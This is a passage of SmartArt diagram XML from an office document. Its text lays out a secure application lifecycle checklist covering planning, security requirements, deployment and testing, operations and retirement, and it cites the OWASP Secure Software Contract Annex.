      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>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Planning and </a:t>
          </a:r>
          <a:b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br>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Design</a:t>
          </a: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Negotiate planning and design with the developers and internal shareholders, e.g. security specialists.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" strike="sngStrike" noProof="0" dirty="0">
            <a:solidFill>
              <a:srgbClr val="4E8542"/>
            </a:solidFill>
          </a:endParaRP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EB2D4C8D-BDCD-4268-8B6F-897D3166DC3E}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>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Retiring Systems</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{95A80FB8-E99D-4B78-9BC2-FB6B67B119BB}" type="parTrans" cxnId="{A9F06D3D-AB20-41E4-A679-6932A40B2975}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E1907769-F900-42C4-90C1-8BD2FCEB9830}" type="sibTrans" cxnId="{A9F06D3D-AB20-41E4-A679-6932A40B2975}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{64E29A9E-D7A3-4691-83A1-965007B0BD76}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-AU" sz="900">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Operations must include guidelines for the security management of the application (e.g. patch management).</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" strike="sngStrike" noProof="0" dirty="0">
            <a:solidFill>
              <a:srgbClr val="4E8542"/>
            </a:solidFill>
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{09E61F83-0B7F-450A-8267-AC41E419DB2F}" type="parTrans" cxnId="{3C1E9E46-D915-461C-BCC6-0B4F63780CB5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2FA6E4AA-CA8D-4524-8451-A2B7B829BDA4}" type="sibTrans" cxnId="{3C1E9E46-D915-461C-BCC6-0B4F63780CB5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6280EA87-E46C-40B8-91EF-12C1C27B37A0}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-AU" sz="900">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Any required data should be archived. All other data should be securely wiped.</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C08C42A3-E914-4795-97F3-69296AA3F73D}" type="parTrans" cxnId="{6E692FED-4175-4B9A-9596-6BB5008D4D8A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F7DE2A44-A11B-4BC7-BC1B-F6D335D0C9F6}" type="sibTrans" cxnId="{6E692FED-4175-4B9A-9596-6BB5008D4D8A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1050" b="1" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Deployment, Testing, and Rollout</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1"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A1D63F8A-2B07-42DD-981B-5171E6B8B8C1}" type="sibTrans" cxnId="{8255EB5E-96BA-4033-B0F3-2209D16DC116}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DB269FA1-9301-43AF-AA70-A9D7CC0462DC}" type="parTrans" cxnId="{8255EB5E-96BA-4033-B0F3-2209D16DC116}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{247D57F2-8E57-4FE8-BC5D-1538DE9C7ED2}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000" bIns="90000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-AU" sz="900" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Negotiate the requirements with internal or external developers, including guidelines and security requirements with respect to your security program, e.g. SDLC, best practices.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AE4D7BED-3056-429A-A072-E4C06F9FCBBF}" type="parTrans" cxnId="{630BF613-79F8-428F-8964-E241E474DFB8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FFAF3F5C-16AC-4210-8AC4-B4A3C7CC1B6C}" type="sibTrans" cxnId="{630BF613-79F8-428F-8964-E241E474DFB8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>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Operations and Change Management</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3AEE799B-7F35-4AE2-93E2-335733E35922}" type="sibTrans" cxnId="{A4BCFA15-B570-475E-8076-E0DF9219BD56}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F7BEB89D-4E4B-4D2E-BAF8-791B6EF09E28}" type="parTrans" cxnId="{A4BCFA15-B570-475E-8076-E0DF9219BD56}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C7D43052-0DE3-42CE-8D15-E3EB141D163C}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000" bIns="90000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="900">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Automate the secure deployment of the application, interfaces and all required components, including needed authorizations.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CEDD41B6-F9E9-4738-8190-4FA86636363D}" type="parTrans" cxnId="{44036FFE-0AC2-47E1-8E4F-1EF89024A280}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F38BA272-2C4D-4E72-B1E6-C51DCA074847}" type="sibTrans" cxnId="{44036FFE-0AC2-47E1-8E4F-1EF89024A280}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{719FD505-9C05-4301-8C8D-24A4329404ED}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000" bIns="90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Compile the technical requirements including functional and nonfunctional security requirements.</a:t>
          </a:r>
          <a:endParaRPr lang="en-AU"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423C079E-E5CB-4C54-9E97-54ADA0F45BF5}" type="parTrans" cxnId="{DE5646CC-F144-493B-9414-C6346E590FF4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{595F5683-5B41-4144-8717-8475FEB51759}" type="sibTrans" cxnId="{DE5646CC-F144-493B-9414-C6346E590FF4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{30CC5E9B-364B-4C35-AF62-6BEDBFA0E938}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000" bIns="90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Plan and negotiate the budget that covers all aspects of design, build, testing and operation, including security activities.</a:t>
          </a:r>
          <a:endParaRPr lang="en-AU"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918768C3-D12F-4161-B487-A57F29898241}" type="parTrans" cxnId="{34810BA8-ABE6-4135-9DA7-66092273C67F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2411AEFD-A010-4099-9F18-B1617D3A6C02}" type="sibTrans" cxnId="{34810BA8-ABE6-4135-9DA7-66092273C67F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{11A0A642-C8B7-49E9-BDCC-9D9E9714D53F}">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Rate the fulfillment of all technical requirements, including a planning and design phase.</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21595102-299C-4FC9-AD15-9036120CA438}" type="parTrans" cxnId="{953325A0-207E-4AE6-A6DC-14B69025B19F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{37C87C90-2FAD-4537-98E9-F3A95D63179A}" type="sibTrans" cxnId="{953325A0-207E-4AE6-A6DC-14B69025B19F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{38353036-4B60-4F8B-ACD2-5B049C807A9A}">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Negotiate all technical requirements, including design, security, and service level agreements (SLA).</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73A5B6BE-984C-43D5-83D1-70267B05EA9B}" type="parTrans" cxnId="{CFC5E301-BDE4-4D4C-B6FC-1C26EB94D275}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{514DE64B-2054-4928-808C-6A92FFA3AA8E}" type="sibTrans" cxnId="{CFC5E301-BDE4-4D4C-B6FC-1C26EB94D275}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{495252AF-5996-4B38-A1EE-B648650A10A0}">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dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Adopt templates and checklists, such as </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-AU" sz="900" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId1"/>
            </a:rPr>
            <a:t>OWASP Secure Software Contract Annex</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-AU" sz="900" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>.</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-AU" sz="900" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="900" b="1" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Note: </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="900" b="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
            </a:rPr>
            <a:t>The annex is for US contract law, so please consult qualified legal advice before using the sample annex</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="900" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5602DF29-E513-4B50-B37A-05F44A5B2860}" type="parTrans" cxnId="{9FCAC402-6721-43DD-BDB5-30970CCF9503}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F126DBDA-495B-4894-915F-3153C0E98C12}" type="sibTrans" cxnId="{9FCAC402-6721-43DD-BDB5-30970CCF9503}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{657D5226-6628-4A3D-87F9-833B7666A7A2}">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Define the security architecture, controls, and countermeasures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appropriate</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-AU" sz="900" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> to the protection needs and the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expected</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>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threat</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>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level</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-AU" sz="900" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>. This should be supported by security specialists.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6430CCC0-80BE-422D-A3E8-13258D4D7A5E}" type="parTrans" cxnId="{6C048991-4CC6-48F3-85DE-06094639B4B0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{572A770A-F271-4A43-9C1A-29DB0F45AD29}" type="sibTrans" cxnId="{6C048991-4CC6-48F3-85DE-06094639B4B0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FB9F0EAE-C91F-4A65-B43A-46392ED38733}">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Ensure that the application owner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accepts</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-AU" sz="900" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> remaining risks or provides additional resources.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DA9F1A23-7ABB-43F5-841D-3D2FC9925CFB}" type="parTrans" cxnId="{2B332EAB-1224-4EC7-902F-FB64603358D2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E2D6A2A1-5438-4DC5-806B-70724658813A}" type="sibTrans" cxnId="{2B332EAB-1224-4EC7-902F-FB64603358D2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7973B29C-5A9A-4A2C-B276-581656BFB1EE}">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In each sprint, ensure security stories are created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that include</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-AU" sz="900" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> constraints added for non-functional requirements.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5BE4E3D-749F-4DF5-916A-F051FA94842E}" type="parTrans" cxnId="{62404027-5448-4393-9E79-DA90FB84286A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{03388AB2-B7BD-4A7D-8228-58066747E14F}" type="sibTrans" cxnId="{62404027-5448-4393-9E79-DA90FB84286A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{436ACC70-9A3F-496B-A85D-CF77D7FC7207}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000" bIns="90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Create "use" and "abuse" test cases from technical and business perspectives.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97196C37-2225-4EC0-AD9D-ED9EDDE36B2E}" type="parTrans" cxnId="{D65047F2-7ED0-4B12-AB6C-8717B38C49DE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5B6FED2A-CCAD-4150-BE86-460500775F70}" type="sibTrans" cxnId="{D65047F2-7ED0-4B12-AB6C-8717B38C49DE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B9654840-CCA9-475F-8026-A0CB36AC23A9}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000" bIns="90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Manage security tests according to internal processes, the protection needs and the level of security required by the application.</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3E0B7461-5330-4740-AF6F-42E7B3BEFEFB}" type="parTrans" cxnId="{2AE97330-074B-4EBD-B20E-409131B4C40C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1D675F40-F864-4B2E-B6E2-C9D29AFA9020}" type="sibTrans" cxnId="{2AE97330-074B-4EBD-B20E-409131B4C40C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{080DE4A9-31B3-4529-9CA3-FC30B3D31A77}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000" bIns="90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Put the application in operation and migrate from previously used applications if needed.</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899E3CF7-9D0C-4165-A610-81A1077E783C}" type="parTrans" cxnId="{48311AAE-790D-405B-BEB3-7AB59042F49A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9AA1C047-7E86-43E3-AA24-C92B3BC7E34B}" type="sibTrans" cxnId="{48311AAE-790D-405B-BEB3-7AB59042F49A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C8A13AC1-43D9-4BE9-9345-EBD28ED64723}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="540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Finalize all documentation, including the change management data base (CMDB) and security architecture.</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E70C6DAC-1356-44C0-BCA2-24EFFF5743FE}" type="parTrans" cxnId="{DCD9FF7A-C041-457B-8A4D-32904C98C1F4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
